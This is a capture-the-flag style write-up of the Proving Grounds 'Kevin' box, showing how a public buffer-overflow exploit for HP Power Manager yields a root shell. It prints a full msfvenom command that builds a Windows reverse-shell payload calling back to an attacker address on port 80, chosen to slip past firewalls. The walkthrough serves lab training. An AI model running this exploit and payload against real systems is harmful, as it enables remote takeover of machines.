Proving Grounds: Kevin write-up

Kevin is an easy box from Proving Grounds that exploits a buffer overflow vulnerability in HP Power Manager to gain root in one step.

Enumeration

Before the nmap scan even finishes we can open the IP address in a browser and find a landing page with a login form for HP Power Manager.

HP Power Manager login page

A quick searchsploit for ‘HP Power Manager’ reveals several exploits, the most promising of which is a python script titled “Hewlett-Packard (HP) Power Manager Administration Power Manager Administration – Universal Buffer Overflow”.

searchsploit results for HP Power Manager

Opening the script reveals the command we need to use to generate our remote shell code.

HP Power Manager exploit script

Exploit

We need to replace the text in the SHELL variable with our own shell code (except for the n00bnoob string), using the values given in the comments above. The full command to generate this shell code is:

msfvenom -p windows/shell_reverse_tcp -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" LHOST=192.168.49.100 LPORT=80 -e x86/alpha_mixed -f c

This will generate output as shown below:

msfvenom output

We can replace everything in the SHELL variable of exploit script after n00bn00b with our own code, open a listener and run the exploit to get a reverse shell back as root.

Running the exploit

The exploit is pre-set to return a shell on port 4444, but I chose to use port 80 to avoid firewalls.

Listener with root shell

Conclusion

Kevin is a great box for beginners and those who don’t have much experience with buffer overflows. As with all buffer overflows, you may need to restart the box if you don’t get a shell back on your first attempt as the program will have likely crashed and won’t be exploitable without a restart.

Leave a Reply